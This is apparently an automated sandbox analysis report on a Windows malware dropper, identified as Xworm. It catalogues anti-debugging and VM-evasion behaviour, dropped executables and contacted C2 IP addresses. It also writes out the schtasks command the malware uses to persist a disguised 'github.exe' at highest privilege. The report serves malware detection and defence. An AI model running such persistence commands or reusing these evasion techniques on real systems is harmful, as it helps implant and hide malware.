                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56608A4 second address: 56608B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 453838B1h 0x00000008 movzx ecx, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56608B9 second address: 56608BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CDE92C instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CDEA21 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E808F4 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F0CFCB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 100E92C instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 100EA21 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 11B08F4 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 123CFCB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSpecial instruction interceptor: First address: 7E1A15 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeSpecial instruction interceptor: First address: 9A9F2E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeMemory allocated: 720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeMemory allocated: 1A490000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeMemory allocated: 1A570000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeMemory allocated: 5070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeMemory allocated: 5380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeMemory allocated: 7380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05660C47 rdtsc 0_2_05660C47
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 418Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeWindow / User API: threadDelayed 1624Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeWindow / User API: threadDelayed 8226Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092Thread sleep count: 37 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092Thread sleep time: -74037s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3220Thread sleep count: 418 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3220Thread sleep time: -12540000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1740Thread sleep count: 45 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1740Thread sleep time: -90045s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3220Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe TID: 7332Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe TID: 7336Thread sleep count: 1624 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe TID: 7336Thread sleep count: 8226 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exe TID: 7372Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe TID: 3688Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmp, EJQ2xs8.exe, EJQ2xs8.exe, 0000000C.00000002.2621094889.0000000000960000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:t
                    Source: cAvEmnl.exe, 00000007.00000002.2896719437.000000001B0B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe=%SystemRoot%\system32\mswsock.dllindingElementImporter, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL"/>
                    Source: cAvEmnl.exe, 00000007.00000002.2895274897.00000000006D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}E
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2896207218.00000000015D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.1709111532.0000000000E60000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1740471339.0000000001190000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1761158882.0000000001190000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmp, EJQ2xs8.exe, 0000000C.00000002.2621094889.0000000000960000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05660C47 rdtsc 0_2_05660C47
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FD652B mov eax, dword ptr fs:[00000030h]6_2_00FD652B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FDA302 mov eax, dword ptr fs:[00000030h]6_2_00FDA302
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe "C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe "C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "github" /tr "C:\Users\user\AppData\Roaming\github.exe"Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: GProgram Manager
                    Source: cAvEmnl.exe, 00000007.00000002.2895978891.0000000002540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: cAvEmnl.exe, 00000007.00000002.2895978891.0000000002540000.00000004.00000800.00020000.00000000.sdmp, EJQ2xs8.exe, EJQ2xs8.exe, 0000000C.00000002.2621094889.0000000000960000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: Program Manager
                    Source: cAvEmnl.exe, 00000007.00000002.2895978891.0000000002540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: cAvEmnl.exe, 00000007.00000002.2895978891.0000000002540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: cAvEmnl.exe, 00000007.00000002.2895978891.0000000002540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FBD3E2 cpuid 6_2_00FBD3E2
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010714001\cb6ddcf80e.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\github.exeQueries volume information: C:\Users\user\AppData\Roaming\github.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FBCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00FBCBEA
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: cAvEmnl.exe, 00000007.00000002.2896719437.000000001B118000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Defender\MsMpeng.exe
                    Source: cAvEmnl.exe, 00000007.00000002.2896719437.000000001B0B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: cAvEmnl.exe, 00000007.00000002.2896719437.000000001B118000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.file.exe.c70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.skotes.exe.fa0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.skotes.exe.fa0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.skotes.exe.fa0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000003.1718912522.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2320707751.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1761097528.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1740413865.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1708915780.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1668428517.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1700108911.0000000005650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 12.2.EJQ2xs8.exe.7d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.cAvEmnl.exe.e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.2443615567.00000000000E8000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.2616843347.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2621060775.00000000007D2000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2895978891.000000000254A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2895978891.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: skotes.exe PID: 2640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: cAvEmnl.exe PID: 5496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: EJQ2xs8.exe PID: 7668, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\github.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 12.2.EJQ2xs8.exe.7d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.cAvEmnl.exe.e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.2443615567.00000000000E8000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.2616843347.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2621060775.00000000007D2000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2895978891.000000000254A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2895978891.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: skotes.exe PID: 2640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: cAvEmnl.exe PID: 5496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: EJQ2xs8.exe PID: 7668, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\github.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, type: DROPPED
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Windows Management Instrumentation
                    11
                    Scheduled Task/Job
                    12
                    Process Injection
                    11
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    2
                    Registry Run Keys / Startup Folder
                    11
                    Scheduled Task/Job
                    1
                    Disable or Modify Tools
                    LSASS Memory861
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts11
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    2
                    Registry Run Keys / Startup Folder
                    361
                    Virtualization/Sandbox Evasion
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive12
                    Ingress Tool Transfer
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading
                    12
                    Process Injection
                    NTDS361
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeylogging112
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSync225
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1565749 Sample: file.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 12 other signatures 2->60 8 skotes.exe 22 2->8         started        13 file.exe 5 2->13         started        15 skotes.exe 2->15         started        17 github.exe 1 2->17         started        process3 dnsIp4 48 185.215.113.43, 49753, 49769, 49784 WHOLESALECONNECTIONSNL Portugal 8->48 50 185.215.113.16, 49823, 49837, 49850 WHOLESALECONNECTIONSNL Portugal 8->50 52 31.41.244.11, 49775, 49805, 80 AEROEXPRESS-ASRU Russian Federation 8->52 34 C:\Users\user\AppData\Local\...JQ2xs8.exe, PE32 8->34 dropped 36 C:\Users\user\AppData\Local\...\cAvEmnl.exe, PE32 8->36 dropped 38 C:\Users\user\AppData\...JQ2xs8[1].exe, PE32 8->38 dropped 44 2 other malicious files 8->44 dropped 80 Hides threads from debuggers 8->80 82 Tries to detect sandboxes / dynamic malware analysis system (registry check) 8->82 84 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 8->84 19 EJQ2xs8.exe 1 8->19         started        22 cAvEmnl.exe 5 8->22         started        40 C:\Users\user\AppData\Local\...\skotes.exe, PE32 13->40 dropped 42 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 13->42 dropped 86 Detected unpacking (changes PE section rights) 13->86 88 Tries to evade debugger and weak emulator (self modifying code) 13->88 90 Tries to detect virtualization through RDTSC time measurements 13->90 26 skotes.exe 13->26         started        92 Multi AV Scanner detection for dropped file 17->92 94 Machine Learning detection for dropped file 17->94 file5 signatures6 process7 dnsIp8 62 Antivirus detection for dropped file 19->62 64 Multi AV Scanner detection for dropped file 19->64 66 Detected unpacking (changes PE section rights) 19->66 78 3 other signatures 19->78 46 179.43.171.209, 49785, 7000 PLI-ASCH Panama 22->46 32 C:\Users\user\AppData\Roaming\github.exe, PE32 22->32 dropped 68 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->68 70 Uses schtasks.exe or at.exe to add and modify task schedules 22->70 28 schtasks.exe 1 22->28         started        72 Machine Learning detection for dropped file 26->72 74 Tries to evade debugger and weak emulator (self modifying code) 26->74 76 Hides threads from debuggers 26->76 file9 signatures10 process11 process12 30 conhost.exe 28->30         started       

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
